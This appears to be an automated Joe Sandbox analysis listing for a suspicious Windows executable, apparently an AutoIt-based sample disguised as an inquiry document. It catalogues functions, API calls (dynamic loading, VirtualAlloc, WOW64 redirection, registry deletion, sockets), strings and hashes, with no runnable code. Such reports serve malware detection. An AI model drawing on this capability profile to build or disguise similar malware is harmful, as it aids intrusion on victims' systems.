                                          • Opcode Fuzzy Hash: 2616f31a8774602fa337d45a3976a3b0816a6b278824f3d9de44ca6d16e0ef78
                                          • Instruction Fuzzy Hash: 5E915C706002019FDB28DF28D885A6ABBF9FF49710F14956EF94AEB791DB70E841CB50
                                          Function 00E1524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                          Download Yara Rule
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00E152DD
                                            • Part of subcall function 00E20340: __87except.LIBCMT ref: 00E2037B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__87except__start
                                          • String ID: pow
                                          • API String ID: 2905807303-2276729525
                                          • Opcode ID: c9cddb55b4f9fcfddbf25ae56294ce85703dededeb08a64767e7f9d79d383838
                                          • Instruction ID: 19c0fc6cd7cfd45d1452dc436f3d2633012670909969088e616e23e0089911a1
                                          • Opcode Fuzzy Hash: c9cddb55b4f9fcfddbf25ae56294ce85703dededeb08a64767e7f9d79d383838
                                          • Instruction Fuzzy Hash: F4515A33A08601CACB11B714E9413EE6BD09B80754F70AD59E4E5B22EBEE74CCC4DA45
                                          Function 00E1023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$+
                                          • API String ID: 0-2552117581
                                          • Opcode ID: 7071067770dd638c7bd4f9864c26fda76c59d04378e8b07566bfd33baeec1c23
                                          • Instruction ID: a3b9101e88ea972539551d08856e1544b987d517e2a5f7a9a30fe0e4b391ac0c
                                          • Opcode Fuzzy Hash: 7071067770dd638c7bd4f9864c26fda76c59d04378e8b07566bfd33baeec1c23
                                          • Instruction Fuzzy Hash: 6F515576904249DFCF15DF28E888AFA7BA4EF16314F145055ECA1BB2A2C7709C86C770
                                          Function 00E03297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove$_free
                                          • String ID: Oa
                                          • API String ID: 2620147621-3945284152
                                          • Opcode ID: e3f88d9764b69d5320ea809777fbbea6ae86e149823b2f24161960c162b07ad1
                                          • Instruction ID: 1d32c9fa1cb6731177c2a79e576ceb1db556ac3dafd466b4aac618a239955dc6
                                          • Opcode Fuzzy Hash: e3f88d9764b69d5320ea809777fbbea6ae86e149823b2f24161960c162b07ad1
                                          • Instruction Fuzzy Hash: 70517DB16083419FDB24CF68D841B6BBBE5FF89304F04592DE989A73A1DB31D981CB52
                                          Function 00E062F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memset$_memmove
                                          • String ID: ERCP
                                          • API String ID: 2532777613-1384759551
                                          • Opcode ID: 88066bba3419c6886fb4f82d7188a0497287167364b8fed07265f4d6ffc400b4
                                          • Instruction ID: d9ac14acb623fc049889e11623c5da5f054a691e3b4e697665f88e90bb11b6ad
                                          • Opcode Fuzzy Hash: 88066bba3419c6886fb4f82d7188a0497287167364b8fed07265f4d6ffc400b4
                                          • Instruction Fuzzy Hash: 1C51A3719007099BDB24CF65C8817EABBF4FF44318F20556EE55AEB281E771A6D4CB40
                                          Function 00E77648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E776D0
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E776E4
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E77708
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: SysMonthCal32
                                          • API String ID: 2326795674-1439706946
                                          • Opcode ID: ff1ab693b1e6e82d34b086cb8bbacc802904362845278b1518dabe99cabfae86
                                          • Instruction ID: 3f407cb266662d6ae25aebb7a1801566ac59d9ea0ead5402127e3192bf612f92
                                          • Opcode Fuzzy Hash: ff1ab693b1e6e82d34b086cb8bbacc802904362845278b1518dabe99cabfae86
                                          • Instruction Fuzzy Hash: EE21BF32500219ABDF15CEA4CC42FEA3BB9EB48718F115254FE597B1D0DAB1A8948BA0
                                          Function 00E76F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E76FAA
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E76FBA
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E76FDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: 780b5722518f6d76ab3a847b7aabf2e273bf3fdaef168b7f3c56633d0e81f4d8
                                          • Instruction ID: 5934ddca7068a23ca59b3fdcafd66d244c2232eea9ad36df112e4419a638dc59
                                          • Opcode Fuzzy Hash: 780b5722518f6d76ab3a847b7aabf2e273bf3fdaef168b7f3c56633d0e81f4d8
                                          • Instruction Fuzzy Hash: D7219232710118BFDF159F54DC85FBB3BAAEF89758F01D124F918AB190CA71AC558BA0
                                          Function 00E7797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E779E1
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E779F6
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E77A03
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: c49860cfbe571bd17c451fba80e85ad0d82d04520c62fbd6db3fbcfe5eb8e06c
                                          • Instruction ID: 14e665281242e3323e9047b41dee5d2400c3b523d4dcc8f5dcf98157d0350e51
                                          • Opcode Fuzzy Hash: c49860cfbe571bd17c451fba80e85ad0d82d04520c62fbd6db3fbcfe5eb8e06c
                                          • Instruction Fuzzy Hash: CD11E732244208BFEF149F61CC05FEB37A9EF89768F024529F745B6090D6719851CB60
                                          Function 00DF4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DF4C2E), ref: 00DF4CA3
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DF4CB5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: cd7b1eacb60b6a546190c6f4d159f9efdb11e821d9651e2bd5d2c268a663c9f4
                                          • Instruction ID: 170ca66c4005782d5259a05696dd0c857687157eeb7571d1dc73e60f1b4cdf1a
                                          • Opcode Fuzzy Hash: cd7b1eacb60b6a546190c6f4d159f9efdb11e821d9651e2bd5d2c268a663c9f4
                                          • Instruction Fuzzy Hash: 28D01730511727CFD720DF32DA1861676E5AF05791F16D83AD88EE6150EA70D8C0CA60
                                          Function 00DF4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DF4CE1,?), ref: 00DF4DA2
                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DF4DB4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-1355242751
                                          • Opcode ID: 611a6f55029bca6a2d664432d69ce2a3708120d50fa0d601ce5cbdeb98953580
                                          • Instruction ID: 648abca74710371ea88f186242a6d39610cf2204f098caa8d5c1b6a931a34ce0
                                          • Opcode Fuzzy Hash: 611a6f55029bca6a2d664432d69ce2a3708120d50fa0d601ce5cbdeb98953580
                                          • Instruction Fuzzy Hash: 50D01731550713CFD720DF32DC48A5676E4AF09365F16C83AD9CAE6150EB70D8C0CA60
                                          Function 00DF4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DF4D2E,?,00DF4F4F,?,00EB62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DF4D6F
                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DF4D81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-3689287502
                                          • Opcode ID: 1f17d225591f9c8d8a08838ec6d9dc32005d4249ee7432b712774ef568fbe208
                                          • Instruction ID: 77e9a1dc0232351831f4056509a8af5b5727dd7df471ecf158ded0901bae0652
                                          • Opcode Fuzzy Hash: 1f17d225591f9c8d8a08838ec6d9dc32005d4249ee7432b712774ef568fbe208
                                          • Instruction Fuzzy Hash: 76D01730511713CFD720DF32DC4862676E8AF15352F1AC83AD48AE6250E670D8C0CA60
                                          Function 00E71072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00E712C1), ref: 00E71080
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E71092
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          • Opcode ID: c950583f4d899860166d31310ac9c4f1acf59dd01333b2fbc3bfccb856d5586c
                                          • Instruction ID: 70444e545bc393889d145376bf3c2db248e2cba0656d615b457170cdab5e9182
                                          • Opcode Fuzzy Hash: c950583f4d899860166d31310ac9c4f1acf59dd01333b2fbc3bfccb856d5586c
                                          • Instruction Fuzzy Hash: 4FD01730510712CFD720DF3AD818A1A7AE4AF0A365F11DC7AE48EFA161E770D8C0CA60
                                          Function 00E693F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E69009,?,00E7F910), ref: 00E69403
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E69415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetModuleHandleExW$kernel32.dll
                                          • API String ID: 2574300362-199464113
                                          • Opcode ID: f842c84c3e20a99285ad300a9eb9a409d5360cdadab356b842e230861be1c9c2
                                          • Instruction ID: 6e350bf9e9ea702ac2f544ec98aa523369d0304212a06c9fa107163bd4c36f84
                                          • Opcode Fuzzy Hash: f842c84c3e20a99285ad300a9eb9a409d5360cdadab356b842e230861be1c9c2
                                          • Instruction Fuzzy Hash: 2AD0C730580313CFD720DF32E98C222B2E8AF05391F00D83AE49AF6952EB70C8C0CA10
                                          Function 00E6E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 00E6E3D2
                                          • CharLowerBuffW.USER32(?,?), ref: 00E6E415
                                            • Part of subcall function 00E6DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E6DAD9
                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E6E615
                                          • _memmove.LIBCMT ref: 00E6E628
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                          • String ID:
                                          • API String ID: 3659485706-0
                                          • Opcode ID: d4929e85f7badb63a8f80c73853c98c104efd96102bdde3cd76893d1e9014568
                                          • Instruction ID: 03f47513205edb1ef17c4b64c36bd452d2a9c4224efb29c56e904da666d456a2
                                          • Opcode Fuzzy Hash: d4929e85f7badb63a8f80c73853c98c104efd96102bdde3cd76893d1e9014568
                                          • Instruction Fuzzy Hash: 5BC19C75A083018FC704DF28C48196ABBE4FF88358F04996DF999AB391D770E946CF92
                                          Function 00E46DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Variant$AllocClearCopyInitString
                                          • String ID:
                                          • API String ID: 2808897238-0
                                          • Opcode ID: 4f6f8e7a7a23f87d47bc735b9bf26a1ddefa6c221273ba18b56fa698360a2774
                                          • Instruction ID: 432e161aea4f174ce83445228141825592bcfe045fa268571b76ed968e7bd004
                                          • Opcode Fuzzy Hash: 4f6f8e7a7a23f87d47bc735b9bf26a1ddefa6c221273ba18b56fa698360a2774
                                          • Instruction Fuzzy Hash: 2F51B6307043019ADB24AF65F891B7AF3E5EF49310F20A81FE5D6EB291DB7098849B56
                                          Function 00E79A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(0179EB10,?), ref: 00E79AD2
                                          • ScreenToClient.USER32(00000002,00000002), ref: 00E79B05
                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E79B72
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID:
                                          • API String ID: 3880355969-0
                                          • Opcode ID: 347800d6deebecbc5efb58a8c7e066d62ae17230760cf08a166c046929cc9ec2
                                          • Instruction ID: 67a1708d82c278f5e7d65f2aad6d430d85f8a56e558e54e645acfda62fbd25af
                                          • Opcode Fuzzy Hash: 347800d6deebecbc5efb58a8c7e066d62ae17230760cf08a166c046929cc9ec2
                                          • Instruction Fuzzy Hash: 31514135A00209EFCF14DF68D8819AE7BB6FF55324F14D259F819AB291D730AD81CB94
                                          Function 00E66CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00E66CE4
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E66CF4
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E66D58
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E66D64
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorLast$__itow__swprintfsocket
                                          • String ID:
                                          • API String ID: 2214342067-0
                                          • Opcode ID: b094c9d833da59f44a329931d2b2e348852a1e4f0b700e69515cda34e72abc38
                                          • Instruction ID: b806ef5f6080170b170471405cc911bd03e338f57852cbbb304168f51e6fe095
                                          • Opcode Fuzzy Hash: b094c9d833da59f44a329931d2b2e348852a1e4f0b700e69515cda34e72abc38
                                          • Instruction Fuzzy Hash: DA419375B40204AFEB10AF24DC96F3A77E5DB04B14F45C458FB59AF2D2DA719D008BA1
                                          Function 00E6672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E7F910), ref: 00E667BA
                                          • _strlen.LIBCMT ref: 00E667EC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
